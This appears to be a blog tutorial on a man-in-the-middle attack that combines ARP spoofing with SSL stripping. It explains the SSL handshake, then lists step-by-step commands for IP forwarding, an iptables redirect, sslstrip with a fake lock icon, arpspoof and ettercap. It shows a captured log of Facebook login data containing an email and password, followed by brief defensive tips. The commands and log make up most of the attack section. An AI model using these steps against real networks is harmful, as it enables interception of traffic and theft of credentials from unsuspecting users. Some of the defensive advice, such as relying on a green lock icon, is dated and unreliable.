Man-in-the-Middle (MitM) Attack + HTTPs strip

What is SSL and how it Works:

   SSL is a security protocol that provides an encrypted  tunnel between the client and the server . SSL uses a cryptographic algorithm that uses encrypts/decrypts data using the server’s public/private keys
SSL Handshake process:
SSL_handshack
SSL Handshake Steps


1. the client browser requests from the web server it’s identification

2. the server replies with a copy to its SSL certificate including the server’s public key

3. the browser checks the certificate in a list of trusted CAs, and that the certificate is unexpired , unrevoked , it’s name is valid, if the browser trusts the certificates it creates and sends to the server the session key (symmetric key) encrypted with the server’s public key.

4. server decrypts the symmetric session key and sends back to the client acknowledgement encrypted with the session key to start the encrypted session

5. server and client now encrypts all transmitted data using the symmetric session key


 img_ssl_how_it_works_1

 

What is Man-in-the-Middle Attack:

 and sometimes is called Monkey-in-the-Middle attack , a type of attack when the attacker intercepts the traffic transmitted between the client and the server , copying the traffic trying to disclosure it’s contents. and forwarding it to the correct destination in order not to perform a denial of service (DoS) attack and thus not to make the victims be suspicious of the interception.
network_1
 
 
 

Attack Steps:

mentioned below the steps attacks from backbox linux distro , while you may use any linux flavour you want and install on it arpspoof, sslstrip and ettercap tools.

network_mitm
1. IP forwarding:

$ echo 1 > /proc/sys/net/ipv4/ip_forward

in case it didn’t accept the command try the below

$ sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"


Or

user@bt:~$ sudo -i
root@bt:~#
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
0
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward 

2. redirecting traffic to port that SSLstrip listens to:

$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234


3. running SSLstrip:

user@bt:/pentest/web/sslstrip$ sudo python sslstrip.py -k -l 1234 -f lock.ico
  • -k: tells the system to kill all currently active sessions, forcing users to re-login to their websites.
  • -l: Listened Port
  • -f: add the https lock icon to deceive the client and let him thinks that connection is secured
 

4. ARP Spoofing (ARP Cache Poisoning) your network using arpspoof tool:

arpspoof -i <interface> -t <targetIP> <gatewayIP>


5. Running ethercap to catch the username and password clearly:

ettercap -Tq -i <interface>
  • T: runs ettercap in text mode
  • q: quite mode, It does not print packet content. It is useful if you want to convert pcap file to ettercap log files.

Or you get it from the SSLstrip logs as below:

 user@bt:~$ cat /pentest/web/sslstrip/sslstrip.log
2013-06-23 05:32:54,818 SECURE POST Data (www.facebook.com):
lsd=AVrakCZQ&email=madooolol%40yahoo.com&pass=12345678&default_persistent=0&timezone=&lgnrnd=023206_glAf&lgnjs=n&locale=en_US
2013-06-23 05:32:57,997 SECURE POST Data (www.facebook.com):
lsd=AVrakCZQ&email=madooolol%40yahoo.com&pass=12345678&default_persistent=0&timezone=&lgnrnd=023206_glAf&lgnjs=n&locale=en_US
2013-06-23 05:33:15,696 SECURE POST Data (www.facebook.com):
lsd=AVrakCZQ&email=madooolol%40yahoo.com&pass=12345678&default_persistent=0&timezone=&lgnrnd=023259_32LY&lgnjs=n&locale=en_US
Or you can do a session hijacking using Hamster.

Defensive actions should be done by the security professional:

  • Dynamic ARP Inspection feature can be used to protect from ARP spoofing
  • make sure that the lock beside the url bar exists and it’s colour is green as shown below this will make you “slightly” sure that the connection is end-to-end (between client and server ) is encrypted.
    • Trusted Certificates example:

 

mozilla_lock
Green lock – trusted certificate – Mozilla website
gmail_lock
Green lock – trusted certificate – Gmail
  • Bad Certificates example: in the following example MITM attack occurs , the traffic is encrypted between the victim and the client with a certificate issued by the attacker, he decrypts the traffic , compromise it , encrypts it again with the correct certificate (issued by the trusted CA) and finally sends it to the server.

gmail_b_cert

References:

Leave a Reply

Your email address will not be published.